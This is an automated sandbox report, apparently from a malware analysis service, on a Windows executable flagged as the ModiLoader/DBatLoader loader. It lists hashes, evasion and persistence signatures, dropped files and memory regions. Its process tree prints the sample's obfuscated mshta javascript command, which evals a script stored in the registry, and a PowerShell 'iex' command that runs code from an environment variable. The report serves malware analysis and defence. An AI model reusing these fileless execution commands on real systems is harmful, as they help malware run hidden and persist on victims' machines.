Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    05-05-2024 10:38

General

  • Target

    174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe

  • Size

    265KB

  • MD5

    174b618aa8d992af5b03d7d1e56d6549

  • SHA1

    e5d20982b70615d945102d9285bdab2c5841a804

  • SHA256

    68d575796afd7a48fdabc4ff88c4aa26a817ddc3b3bb1df8a9705b58d57aa534

  • SHA512

    10885d086f248c681ee37d9bb2ecc446fbea89215a8c09ea04268ddceb7aab3e3a598d57e6d7ebeaf9a8a9e64f3f61eb8bbbf7449566db417ec693c4c7330599

  • SSDEEP

    6144:veX94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQev:OSnYPweZnl+EER+iv6Iev

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 60 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\174b618aa8d992af5b03d7d1e56d6549_JaffaCakes118.exe"
      2⤵
        PID:2964
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:zmBQ1EBe="BdR";V8D=new%20ActiveXObject("WScript.Shell");BBZO8g="vqug3";R8g4ti=V8D.RegRead("HKLM\\software\\Wow6432Node\\6OaAcnU6oR\\uG8ll44Q");jXMAyZ5e="tS3";eval(R8g4ti);jFVWZ1p9="V";
      1⤵
      • Process spawned unexpected child process
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ewmduqv
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2972
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:548
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:2320

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\ed3e8\5cad4.cc93a6

        Filesize

        7KB

        MD5

        17c2feec8d8cd6c7175a63a3e22697e5

        SHA1

        fddaa6208be9680e23e87b88ec707f3059418cc4

        SHA256

        caebe694e9bc08a3ac62ec01f2ad555c3f698981108bec5f96ce0d9dca1ab4f3

        SHA512

        9fd8d3edd4aa39d5f7ef92fd807a8373ef549494cc4a9ad9825a16afefd32b9bf9dbf379562242ee78daca2a7b0e2f2c4c32e1e3f1d32d60549a7400abcf49b1

      • C:\Users\Admin\AppData\Local\ed3e8\bc0ec.bat

        Filesize

        58B

        MD5

        c9726b1023d08f87d7c310ef440fc21a

        SHA1

        e121739a7d5fd0bd5e0a08827105a41798195629

        SHA256

        009c0ef73332c5aae4e96ba2013e33cda30f312c604c5b1e768c190a522160fc

        SHA512

        571d0720f495a92114cdce0abbf951bd3ac6f66394adc88964c3870feb2552640290d65bf739c9e844e4f0c33ddbda9e39f6e66cfaad8a4b35a210df05efe1b0

      • C:\Users\Admin\AppData\Local\ed3e8\d468b.lnk

        Filesize

        865B

        MD5

        0bbae68e1bf27688101982818f2af721

        SHA1

        eec23a77c10421c076a830e2f3a228787bf4ff77

        SHA256

        f7930b6a95bbd17aca56b5b22416894250f8f3f6cd6a0a42053ccab36049049f

        SHA512

        786cba984e472130334c2320377caa12205e0f225b7c063236b7d89be07349fd8bcacef7ddaf20875718d109ea8657a795b971c402b4fdbf07e52b3eb4fe1223

      • C:\Users\Admin\AppData\Roaming\158f4\93aca.cc93a6

        Filesize

        2KB

        MD5

        c526c054442dc01f31f327e717587dde

        SHA1

        f4950bab882fb99e4082f561782e40562e22b747

        SHA256

        5cb02f1696f2c3040dc2ac67083be53d9be9a5ad74796b1aa68959acd5cdef19

        SHA512

        9a87f8c134131bc131ef55c21cee618488e98cc34116e87d33277a9808742039d980057e7e8eaca5b4f319319f678f112a0e553f82b5f9439c324c2ae37a3199

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnk

        Filesize

        981B

        MD5

        fa9687e971faaef2f479e4ead1b65832

        SHA1

        1cfca086655f3281621540a8c0d156c692eeac38

        SHA256

        56a483c24f498e18ba8c42e3a3d6b75705142ae1c40a101877126e860a9b10ff

        SHA512

        7df5ccf171cd6c9f62dd45f08a4f0f0f74cc36ba0ab7a938e03a65e9b29777d16dfcaa0fc52f79a7a778bf0fe5420f195625e9c7de024b5fdc7281739c531a57

      • memory/548-37-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-54-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-58-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-25-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-36-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-27-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-34-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-38-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-49-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-30-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-29-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-28-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-31-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-32-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-47-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-57-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-41-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-48-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-46-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-45-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-65-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-66-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-44-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-43-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-42-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-40-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-39-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-23-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-55-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-56-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-35-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/548-33-0x00000000001B0000-0x00000000002F1000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-83-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-86-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-76-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-78-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-72-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-75-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-77-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-81-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-85-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-74-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-73-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-79-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-87-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-80-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-84-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2320-82-0x0000000000110000-0x0000000000251000-memory.dmp

        Filesize

        1.3MB

      • memory/2964-10-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-4-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2964-11-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-12-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-2-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2964-7-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-8-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-9-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-6-0x0000000001DA0000-0x0000000001E76000-memory.dmp

        Filesize

        856KB

      • memory/2964-5-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2972-21-0x0000000006310000-0x00000000063E6000-memory.dmp

        Filesize

        856KB

      • memory/2972-26-0x0000000006310000-0x00000000063E6000-memory.dmp

        Filesize

        856KB